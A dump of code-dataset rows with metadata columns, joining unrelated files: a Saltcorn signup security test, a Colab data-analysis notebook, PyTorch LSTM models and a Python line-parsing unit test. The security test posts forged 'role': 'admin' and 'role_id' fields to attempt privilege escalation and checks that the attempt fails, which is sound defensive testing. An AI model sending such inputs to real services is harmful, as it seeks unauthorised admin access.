| 38.603687 | 120 | 0.68891 | 4,616 | 33,508 | 4.795277 | 0.042678 | 0.006054 | 0.007454 | 0.023492 | 0.958618 | 0.95532 | 0.954732 | 0.953377 | 0.949492 | 0.947775 | 0 | 0.056917 | 0.173123 | 33,508 | 867 | 121 | 38.648212 | 0.741979 | 0.008147 | 0 | 0.907363 | 0 | 0.015439 | 0.258257 | 0.046184 | 0 | 0 | 0 | 0 | 0.15677 | 0 | null | null | 0 | 0.019002 | null | null | 0.190024 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f3d0f56f8b22a484098e32849e88c21c4f80007f | 5,481 | py | Python | infosec-scan/py-sectest/custom_login_signup_test.py | em3ndez/saltcorn | 1e0f6e6a049a36e501e5cd16fc42e14714f87c95 | [
"MIT"
] | 689 | 2020-05-23T10:33:50.000Z | 2022-03-31T23:10:50.000Z | infosec-scan/py-sectest/custom_login_signup_test.py | em3ndez/saltcorn | 1e0f6e6a049a36e501e5cd16fc42e14714f87c95 | [
"MIT"
] | 424 | 2020-08-10T17:24:08.000Z | 2022-03-25T11:52:10.000Z | infosec-scan/py-sectest/custom_login_signup_test.py | em3ndez/saltcorn | 1e0f6e6a049a36e501e5cd16fc42e14714f87c95 | [
"MIT"
] | 155 | 2020-06-03T05:44:35.000Z | 2022-03-29T00:46:05.000Z | from scsession import SaltcornSession
class Test:
    def setup_class(self):
        SaltcornSession.cli("reset-schema", "-f")
        SaltcornSession.cli("install-pack", "-f", SaltcornSession.asset_path("custom_login_signup_pack.json"))
        SaltcornSession.cli("set-cfg", "new_user_form", "userinfo")
        SaltcornSession.cli("set-cfg", "login_form", "login")
        SaltcornSession.cli("set-cfg", "signup_form", "signup")
        SaltcornSession.cli("set-cfg", "user_settings_form", "userinfo")
        self.sess = SaltcornSession(3001)

    def teardown_class(self):
        self.sess.close()

    def cannot_access_admin(self):
        self.sess.get('/table')
        assert self.sess.status == 302
        assert "Your tables" not in self.sess.content

    def test_can_signup_custom(self):
        self.sess.reset()
        self.sess.get('/auth/signup')
        assert "Sign up" in self.sess.content
        assert ">username<" in self.sess.content
        assert self.sess.status == 200
        self.sess.postForm('/auth/signup',
                           {'email': 'thebestuser@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435y5OPtyj',
                            'username': 'foobar',
                            '_csrf': self.sess.csrf()
                            })
        assert '>age<' in self.sess.content
        assert 'action="/auth/signup_final"' in self.sess.content
        self.sess.postForm('/auth/signup_final',
                           {'age': '34',
                            'email': 'thebestuser@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435y5OPtyj',
                            'username': 'foobar',
                            '_csrf': self.sess.csrf()
                            })
        assert self.sess.redirect_url == '/'
        self.sess.follow_redirect()
        assert '>Welcome' in self.sess.content

    def test_cannot_become_admin_signup_custom(self):
        self.sess.reset()
        self.sess.get('/auth/signup')
        assert "Sign up" in self.sess.content
        assert ">username<" in self.sess.content
        assert self.sess.status == 200
        self.sess.postForm('/auth/signup',
                           {'email': 'thebestuse6r@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435y5OPtyj',
                            'username': 'foobaz',
                            'role': 'admin',
                            'role_id': '1',
                            '_csrf': self.sess.csrf()
                            })
        assert '>age<' in self.sess.content
        assert 'action="/auth/signup_final"' in self.sess.content
        self.sess.postForm('/auth/signup_final',
                           {'age': '34',
                            'email': 'thebestuse6r@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435y5OPtyj',
                            'username': 'foobaz',
                            'role': 'admin',
                            'role_id': '1',
                            '_csrf': self.sess.csrf()
                            })
        assert self.sess.redirect_url == '/'
        self.sess.follow_redirect()
        assert '>Welcome' in self.sess.content
        self.cannot_access_admin()

    def test_cannot_become_admin_signup_custom1(self):
        self.sess.reset()
        self.sess.get('/auth/signup')
        assert "Sign up" in self.sess.content
        assert ">username<" in self.sess.content
        assert self.sess.status == 200
        self.sess.postForm('/auth/signup',
                           {'email': 'thebestuse7r@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435y5OPtyj',
                            'username': 'foobap',
                            'role': '1',
                            '_csrf': self.sess.csrf()
                            })
        assert '>age<' in self.sess.content
        assert 'action="/auth/signup_final"' in self.sess.content
        self.sess.postForm('/auth/signup_final',
                           {'age': '34',
                            'email': 'thebestuse7r@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435y5OPtyj',
                            'username': 'foobap',
                            'role': '1',
                            '_csrf': self.sess.csrf()
                            })
        assert self.sess.redirect_url == '/'
        self.sess.follow_redirect()
        assert '>Welcome' in self.sess.content
        self.cannot_access_admin()

    def test_password_repeat(self):
        self.sess.reset()
        self.sess.get('/auth/signup')
        assert "Sign up" in self.sess.content
        assert ">username<" in self.sess.content
        assert self.sess.status == 200
        self.sess.postForm('/auth/signup',
                           {'email': 'thebestuser9@mail.com',
                            'password': 'ty435y5OPtyj',
                            'passwordRepeat': 'ty435w5OPtyj',
                            'username': 'berry',
                            '_csrf': self.sess.csrf()
                            })
        assert self.sess.redirect_url == '/auth/signup'
        self.sess.follow_redirect()
        assert 'Passwords do not match' in self.sess.content

    def test_password_repeat_missing(self):
        self.sess.reset()
        self.sess.get('/auth/signup')
        assert "Sign up" in self.sess.content
        assert ">username<" in self.sess.content
        assert self.sess.status == 200
        self.sess.postForm('/auth/signup',
                           {'email': 'thebestuser10@mail.com',
                            'password': 'ty435y5OPtyj',
                            'username': 'berr1y',
                            '_csrf': self.sess.csrf()
                            })
        print(self.sess.content)
        assert self.sess.redirect_url == '/auth/signup'
        self.sess.follow_redirect()
        assert 'Passwords do not match' in self.sess.content
| 38.0625 | 110 | 0.558475 | 569 | 5,481 | 5.27065 | 0.156415 | 0.181394 | 0.115038 | 0.124708 | 0.787596 | 0.773925 | 0.742914 | 0.742914 | 0.742914 | 0.737579 | 0 | 0.02622 | 0.297209 | 5,481 | 144 | 111 | 38.0625 | 0.752336 | 0 | 0 | 0.753731 | 0 | 0 | 0.253696 | 0.043256 | 0 | 0 | 0 | 0 | 0.246269 | 1 | 0.059701 | false | 0.141791 | 0.007463 | 0 | 0.074627 | 0.007463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
f3d21d6e2a9d99408278747f314312cb0cc93377 | 658,717 | py | Python | scripts-python/projeto_relatorio_analise_exploratoria.py | rosacarla/DIO-data-projects | 072c76d10bdb98515fa174020469431c82096c23 | [
"MIT"
] | 1 | 2022-03-29T04:16:09.000Z | 2022-03-29T04:16:09.000Z | scripts-python/projeto_relatorio_analise_exploratoria.py | rosacarla/DIO-data-projects | 072c76d10bdb98515fa174020469431c82096c23 | [
"MIT"
] | null | null | null | scripts-python/projeto_relatorio_analise_exploratoria.py | rosacarla/DIO-data-projects | 072c76d10bdb98515fa174020469431c82096c23 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Projeto_Relatorio_Analise_Exploratoria.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/13JeYhek8rkHLncTOMIv-FBeSauVj0lv3

________________________________________________________________________________
###Author: Carla Edila Santos da Rosa Silveira
###Contact: rosa.carla@pucpr.edu.br
###Original version: [Rodrigo Correa](https://www.linkedin.com/pulse/seu-primeiro-projeto-em-python-an%25C3%25A1lise-de-dados-com-pandas-correa/?trackingId=fgbWwU%2FLYynQJpW2zPh93w%3D%3D)
###Technologies: Google Drive and Colab, [Kaggle](https://www.kaggle.com/), [Pixabay](https://pixabay.com/pt/), [Github](https://github.com/), [Pandas library](https://pandas.pydata.org/), [Python](https://www.python.org/)
###Dataset: Houses to Rent (a database of 10,000 rental properties in Brazil)
#Project: Exploratory Data Analysis Report
________________________________________________________________________________

######Image by <a href="https://pixabay.com/pt/users/geralt-9301/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=909710">Gerd Altmann</a> from <a href="https://pixabay.com/pt/?utm_source=link-attribution&utm_medium=referral&utm_campaign=image&utm_content=909710">Pixabay</a>
________________________________________________________________________________
##Mounting the Drive
"""
from google.colab import drive  # import your personal Google Drive
drive.mount('/content/drive')  # mount the drive in Colab
!ls '/content/drive/My Drive/Colab Notebooks'  # show the contents of the Colab Notebooks folder and the Data folder with the dataset
"""##Loading the data"""
import pandas as pd  # import Python's Pandas library
Dados = pd.read_csv('/content/drive/My Drive/Colab Notebooks/Data/houses_to_rent_v2.csv')  # load the database under a new name
"""##First look at the dataset"""
Dados.info()  # overview of the data structure
Dados.head(12)  # read the first 12 rows of the dataset
"""##Installing the data report generator"""
! pip install https://github.com/pandas-profiling/pandas-profiling/archive/master.zip  # install the Pandas Profiling report generator (do not run again!)
"""##Loading the Profile Report library"""
from pandas_profiling import ProfileReport  # import the library (do not run again!)
"""##Generating the Exploratory Analysis Report"""
profile = ProfileReport(Dados, title='Dados Alugueis Capitais', html={'style': {'full_width': True}})  # name the report, set the HTML format and full-width layout
profile.to_notebook_iframe()  # render the report inline as HTML
profile.to_file("report_residencias.html")  # report generated as HTML
"""##Saving the report to the Drive"""
profile.to_file(output_file='/content/drive/My Drive/Colab Notebooks/Pandas Profiling Report_Residencias.html')  # report saved to the drive
"""##Final version of the [Relatorio Dados Alugueis Capitais](https://docs.google.com/document/d/1r6GguJ1s5jJn5d1JXcid2IZ4G9z4Nj5pYVX2hgrTAIM/edit?usp=sharing).
_______________________________________________________________________________
###Author: Carla Edila Santos da Rosa Silveira
###Contact: rosa.carla@pucpr.edu.br
###Developed on: 04/08/2021
________________________________________________________________________________
""" | 9,148.847222 | 367,501 | 0.961108 | 24,674 | 658,717 | 25.641282 | 0.757842 | 0.001652 | 0.002102 | 0.002403 | 0.051821 | 0.051722 | 0.050524 | 0.046972 | 0.04652 | 0.04652 | 0 | 0.15665 | 0.000457 | 658,717 | 72 | 367,502 | 9,148.847222 | 0.804251 | 0.000826 | 0 | 0 | 1 | 0 | 0.37196 | 0.11731 | 0 | 1 | 0 | 0.013889 | 0 | 0 | null | null | 0 | 0.230769 | null | null | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f3ef3d1900bef2841c0338c503df0f8bd4ea8e99 | 5,167 | py | Python | models.py | sushitea/time_series_sensor_DL | ea65182a95a4ca52b2d26acf32442d406edfb7da | [
"MIT"
] | null | null | null | models.py | sushitea/time_series_sensor_DL | ea65182a95a4ca52b2d26acf32442d406edfb7da | [
"MIT"
] | null | null | null | models.py | sushitea/time_series_sensor_DL | ea65182a95a4ca52b2d26acf32442d406edfb7da | [
"MIT"
] | null | null | null | import torch
from torch import nn
class DeepConvLSTM(nn.Module):
    def __init__(self, n_channels, len_seq=24, n_hidden=128, n_layers=2, n_filters=64,
                 n_classes=18, filter_size=5, pool_filter_size=3, dropout_probability=0.5):
        super(DeepConvLSTM, self).__init__()  # Call init function for nn.Module whenever this function is called
        self.n_channels = n_channels
        self.dropout_probability = dropout_probability  # Dropout probability
        self.len_seq = len_seq
        self.n_layers = n_layers  # Number of layers in the lstm network
        self.n_hidden = n_hidden  # number of hidden units per layer in the lstm
        self.n_filters = n_filters  # number of convolutional filters per layer
        self.n_classes = n_classes  # number of target classes
        self.filter_size = filter_size  # convolutional filter size
        self.pool_filter_size = pool_filter_size  # max pool filter size if using
        self.convlayer = nn.Sequential(
            nn.Conv1d(n_channels, n_filters, (filter_size)),
            nn.Conv1d(n_filters, n_filters, (filter_size)),
            nn.Conv1d(n_filters, n_filters, (filter_size)),
            nn.Conv1d(n_filters, n_filters, (filter_size))
        )
        self.lstm = nn.LSTM(n_filters, n_hidden, n_layers, batch_first=True)
        self.dropout = nn.Dropout(p=dropout_probability)
        self.predictor = nn.Linear(n_hidden, n_classes)

    def forward(self, x, hidden, batch_size):
        x = x.view(-1, self.n_channels, self.len_seq)
        x = self.convlayer(x)
        x = x.view(batch_size, -1, self.n_filters)
        x, hidden = self.lstm(x, hidden)
        x = self.dropout(x)
        x = x.view(batch_size, -1, self.n_hidden)[:, -1, :]
        out = self.predictor(x)
        return out, hidden

    def init_hidden(self, batch_size):
        weight = next(self.parameters()).data  # return a Tensor from self.parameters to use as a base for the initial hidden state.
        # Generate new tensors of zeros with similar type to weight, but different size.
        if torch.cuda.is_available():
            hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda(),  # Hidden state
                      weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda())  # Cell state
        else:
            hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden),
                      weight.new_zeros(self.n_layers, batch_size, self.n_hidden))
        return hidden
class DeepConvLSTM_mod(nn.Module):
    def __init__(self, n_channels, len_seq=24, n_hidden=128, n_layers=2, n_filters=64,
                 n_classes=2, filter_size=5, pool_filter_size=3, dropout_probability=0.5):
        super(DeepConvLSTM_mod, self).__init__()  # Call init function for nn.Module whenever this function is called
        self.n_channels = n_channels
        self.dropout_probability = dropout_probability  # Dropout probability
        self.len_seq = len_seq
        self.n_layers = n_layers  # Number of layers in the lstm network
        self.n_hidden = n_hidden  # number of hidden units per layer in the lstm
        self.n_filters = n_filters  # number of convolutional filters per layer
        self.n_classes = n_classes  # number of target classes
        self.filter_size = filter_size  # convolutional filter size
        self.pool_filter_size = pool_filter_size  # max pool filter size if using
        # Convolutional net
        self.convlayer = nn.Sequential(
            nn.Conv1d(n_channels, n_filters, (filter_size)),
            nn.Conv1d(n_filters, n_filters, (filter_size)),
            nn.Conv1d(n_filters, n_filters, (filter_size)),
            nn.Conv1d(n_filters, n_filters, (filter_size))
        )
        # LSTM layers
        self.lstm = nn.LSTM(n_filters, n_hidden, n_layers, batch_first=True)
        # Dropout layer
        self.dropout = nn.Dropout(p=dropout_probability)
        # Output layer
        self.predictor = nn.Linear(n_hidden, n_classes)

    def forward(self, x, hidden, batch_size):
        # Reshape x if necessary to add the 2nd dimension
        x = x.view(-1, self.n_channels, self.len_seq)
        x = self.convlayer(x)
        x = x.view(batch_size, -1, self.n_filters)
        x, hidden = self.lstm(x, hidden)
        x = self.dropout(x)
        x = x.view(batch_size, -1, self.n_hidden)[:, -1, :]
        out = self.predictor(x)
        return out, hidden

    def init_hidden(self, batch_size):
        weight = next(self.parameters()).data  # return a Tensor from self.parameters to use as a base for the initial hidden state.
        # Generate new tensors of zeros with similar type to weight, but different size.
        if torch.cuda.is_available():
            hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda(),  # Hidden state
                      weight.new_zeros(self.n_layers, batch_size, self.n_hidden).cuda())  # Cell state
        else:
            hidden = (weight.new_zeros(self.n_layers, batch_size, self.n_hidden),
                      weight.new_zeros(self.n_layers, batch_size, self.n_hidden))
return hidden | 47.842593 | 131 | 0.653184 | 735 | 5,167 | 4.363265 | 0.137415 | 0.053009 | 0.04116 | 0.039913 | 0.950421 | 0.950421 | 0.950421 | 0.926099 | 0.926099 | 0.926099 | 0 | 0.011387 | 0.252177 | 5,167 | 108 | 132 | 47.842593 | 0.818582 | 0.204955 | 0 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.02439 | 0 | 0.170732 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f3f4c91869746520ec8bb76b607c63e9c5901ae8 | 67 | py | Python | toolkit/routes/serp/__init__.py | salonimalhotra-ui/seo-audits-toolkit | 99af8b53dffad45f679eaf06b4a8080df75fcd72 | [
"MIT"
] | 1 | 2020-12-21T18:21:34.000Z | 2020-12-21T18:21:34.000Z | toolkit/routes/serp/__init__.py | x0rzkov/seo-audits-toolkit | 29994cbab51bd0697c717b675df3c176096e4f03 | [
"MIT"
] | null | null | null | toolkit/routes/serp/__init__.py | x0rzkov/seo-audits-toolkit | 29994cbab51bd0697c717b675df3c176096e4f03 | [
"MIT"
] | null | null | null | import toolkit.routes.serp.api
import toolkit.routes.serp.dashboard | 33.5 | 36 | 0.865672 | 10 | 67 | 5.8 | 0.6 | 0.448276 | 0.655172 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044776 | 67 | 2 | 36 | 33.5 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f3fdf6972ddfa7a4da895550c7d26e6df45f7872 | 164 | py | Python | 01-first-python-project/simple_interest.py | mkumar-552/learn-programming-with-python- | cb0aa11c741019959ce3db84552a7e012486092e | [
"MIT"
] | 64 | 2018-05-25T01:26:31.000Z | 2022-03-03T20:42:20.000Z | 01-first-python-project/simple_interest.py | mkumar-552/learn-programming-with-python- | cb0aa11c741019959ce3db84552a7e012486092e | [
"MIT"
] | null | null | null | 01-first-python-project/simple_interest.py | mkumar-552/learn-programming-with-python- | cb0aa11c741019959ce3db84552a7e012486092e | [
"MIT"
] | 72 | 2018-05-24T15:04:46.000Z | 2022-03-08T04:19:18.000Z | def calculate_simple_interest(principal, interest, duration) :
return principal * (1 + interest * 0.01 * duration)
print(calculate_simple_interest(10000,5,5))
| 32.8 | 62 | 0.762195 | 21 | 164 | 5.761905 | 0.619048 | 0.247934 | 0.380165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0.128049 | 164 | 4 | 63 | 41 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 0.666667 | 0.333333 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6d1095cba3809be4bb83b071d6143ffe5ae8787a | 151 | py | Python | examples/pipeline/app.py | SuperCarers/simple-settings | e46d148fc1fbf3b65ef354b4eec57074f590aa7d | [
"MIT"
] | null | null | null | examples/pipeline/app.py | SuperCarers/simple-settings | e46d148fc1fbf3b65ef354b4eec57074f590aa7d | [
"MIT"
] | 1 | 2018-03-28T14:43:01.000Z | 2018-03-28T14:43:01.000Z | examples/pipeline/app.py | jakul/simple-settings | 936df02049d2323ace0d0d42bcf467c299b09c71 | [
"MIT"
] | 1 | 2021-01-06T03:59:29.000Z | 2021-01-06T03:59:29.000Z | # -*- coding: utf-8 -*-
from simple_settings import settings
print(settings.ONLY_IN_FIRST)
print(settings.ONLY_IN_SECOND)
print(settings.SIMPLE_CONF)
| 21.571429 | 36 | 0.794702 | 22 | 151 | 5.181818 | 0.590909 | 0.342105 | 0.298246 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007246 | 0.086093 | 151 | 6 | 37 | 25.166667 | 0.818841 | 0.139073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
6d188c9e41920cda106822e6e1adf1957b8e6a2e | 19,316 | py | Python | tests/util/linestest.py | zxkjack123/pypact | 8b37f42007e0accabc9fb31d4ab76935b559d817 | [
"Apache-2.0"
] | 18 | 2018-01-22T14:00:18.000Z | 2022-03-08T06:29:22.000Z | tests/util/linestest.py | listato/pypact | a418ba218cdf4a25ae3e7d72e0919905d027d2ba | [
"Apache-2.0"
] | 28 | 2018-12-07T14:30:46.000Z | 2022-02-27T20:33:06.000Z | tests/util/linestest.py | listato/pypact | a418ba218cdf4a25ae3e7d72e0919905d027d2ba | [
"Apache-2.0"
] | 8 | 2018-05-29T13:41:59.000Z | 2021-01-21T01:33:41.000Z | import os
from tests.testerbase import Tester, REFERENCE_DIR
import pypact.util.lines as lines
from pypact.util.file import content_as_str
class LinesUnitTest(Tester):
def setUp(self):
self.base_dir = os.path.join(REFERENCE_DIR)
self.filename_test91out = os.path.join(self.base_dir, "test91.out")
self.file_as_string = content_as_str(self.filename_test91out)
# DO NOT CHANGE THIS TEXT. IT IS USED FOR TESTING
self.teststr = """This is a line.
This is another line after a space
Here are some values 3.4, 88.93e7 and -0.83324e-5 with some text. (738.9)
Here are some \tmore values \t783.4 ** * 3248.93e7 !and -10.83324e+3 with some text. (0.598e+6)
blah blah 6 4 dajsl 2.3
HEADER
you see it here
and here 4.615 * & 5.02e-4 tag 0.472e-8 ^55 fdjl
HEADER
you see it here
and here 14.65 * & 5.032e-4 tag 0.4342e-3 ^545 fdjddl
HEADER2
you seedhfsdjkl it here
and here 44.65 * & 52.02e-4 tag 0.342e-4 ^55 fdjl fds
""".splitlines()
def test_line_indices(self):
self.assertEqual(lines.line_indices(self.teststr, 'This'), [0, 2])
self.assertEqual(lines.line_indices(self.teststr, 'another'), [2])
self.assertEqual(lines.line_indices(self.teststr, 'This is a line'), [0])
self.assertEqual(lines.line_indices(self.teststr, 'This is a lines'), [])
self.assertEqual(lines.line_indices(self.teststr, 'This is another line after a space'), [])
self.assertEqual(lines.line_indices(self.teststr, 'This is another line after a space'), [2])
self.assertEqual(lines.line_indices(self.teststr, 'blah'), [8])
self.assertEqual(lines.line_indices(self.teststr, 'blah blah'), [8])
self.assertEqual(lines.line_indices(self.teststr, '6'), [6, 8, 14, 20, 26])
self.assertEqual(lines.line_indices(self.teststr, '3'), [3, 6, 8, 20, 26])
self.assertEqual(lines.line_indices(self.teststr, '738.9'), [3])
self.assertEqual(lines.line_indices(self.teststr, '(738.9)'), [3])
self.assertEqual(lines.line_indices(self.teststr, ' (738.9)'), [3])
self.assertEqual(lines.line_indices(self.teststr, ' (738.9)'), [3])
self.assertEqual(lines.line_indices(self.teststr, ' (738.9) '), [])
self.assertEqual(lines.line_indices(self.teststr, '!'), [6])
self.assertEqual(lines.line_indices(self.teststr, ' !'), [6])
self.assertEqual(lines.line_indices(self.teststr, ' !and'), [6])
self.assertEqual(lines.line_indices(self.teststr, ' ! '), [])
self.assertEqual(lines.line_indices(self.teststr, ' some text '), [])
self.assertEqual(lines.line_indices(self.teststr, ' some text. '), [3, 6])
self.assertEqual(lines.line_indices(self.teststr, 'HEADER'), [10, 16, 22])
self.assertEqual(lines.line_indices(self.teststr, 'HEADER2'), [22])
self.assertEqual(lines.line_indices(self.teststr, ' '), [0,2,3,6,8,10,12,14,16,18,20,22,24,26,27])
self.assertEqual(lines.line_indices(self.teststr, '\n'), [])
def test_string_from_line(self):
self.assertEqual(
lines.strings_from_line(self.teststr[0], 'This'), ['is', 'a', 'line.'])
self.assertEqual(
lines.strings_from_line(self.teststr[0], 'is'), ['is', 'a', 'line.'])
self.assertEqual(
lines.strings_from_line(self.teststr[0], 'a'), ['line.'])
self.assertEqual(
lines.strings_from_line(self.teststr[1], 'This'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[2], 'This'), ['is', 'another', 'line', 'after', 'a', 'space'])
self.assertEqual(
lines.strings_from_line(self.teststr[3], 'This'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[16], 'HEADER'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[22], 'HEADER'), ['2'])
self.assertEqual(
lines.strings_from_line(self.teststr[22], 'HEADER2'), [])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag'), ['0.342e-4', '^55', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^']), ['0.342e-4', '^55', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^55']), ['0.342e-4', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'djl']), ['0.342e-4', 'fdjl', 'fds'])
self.assertEqual(
lines.strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl']), ['0.342e-4', 'fds'])
self.assertEqual(lines.strings_from_line(self.file_as_string[83], 'TOTAL ACTIVITY EXCLUDING TRITIUM'),
['1.45396E+07', 'Bq'])
def test_join_strings_from_line(self):
self.assertEqual(
lines.join_strings_from_line(self.teststr[0], 'This'), 'is a line.')
self.assertEqual(
lines.join_strings_from_line(self.teststr[0], 'is'), 'is a line.')
self.assertEqual(
lines.join_strings_from_line(self.teststr[0], 'a'), 'line.')
self.assertEqual(
lines.join_strings_from_line(self.teststr[1], 'This'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This'), 'is another line after a space')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This', endtag='a space'), 'is another line after a space')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This', endtag='space'), 'is another line after a')
self.assertEqual(
lines.join_strings_from_line(self.teststr[2], 'This', endtag='another'), 'is')
self.assertEqual(
lines.join_strings_from_line(self.teststr[3], 'This'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[16], 'HEADER'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[22], 'HEADER'), '2')
self.assertEqual(
lines.join_strings_from_line(self.teststr[22], 'HEADER2'), '')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag'), '0.342e-4 ^55 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^']), '0.342e-4 ^55 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55']), '0.342e-4 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'djl']), '0.342e-4 fdjl fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl']), '0.342e-4 fds')
self.assertEqual(
lines.join_strings_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl'], endtag='fds'), '0.342e-4')
def test_first_value_from_line(self):
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[0], 'This')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[0], 'is')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[0], 'a')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[1], 'This')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[2], 'This')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[3], 'This')))
self.assertEqual(
lines.first_value_from_line(self.teststr[6], 'Here'), 783.4)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '**'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '** *'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '*'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], ' *'), 3248.93e7)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], ' *', ignoretags=['3248.93e7']), -10.83324e+3)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '3248.93e7'), -10.83324e+3)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '!'), -10.83324e+3)
self.assertEqual(
lines.first_value_from_line(self.teststr[6], '!and'), -10.83324e+3)
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[16], 'HEADER')))
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[22], 'HEADER2')))
self.assertEqual(
lines.first_value_from_line(self.teststr[22], 'HEADER'), 2)
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag'), 0.342e-4)
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['^']), 0.342e-4)
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['^55']), 0.342e-4)
self.assertTrue(
self._isnotfound(lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['0.342e-4', '^55', 'djl'])))
self.assertEqual(
lines.first_value_from_line(self.teststr[26], 'tag', ignoretags=['^55', 'fdjl']), 0.342e-4)
def test_first_occurrence(self):
notfound = (-1, '')
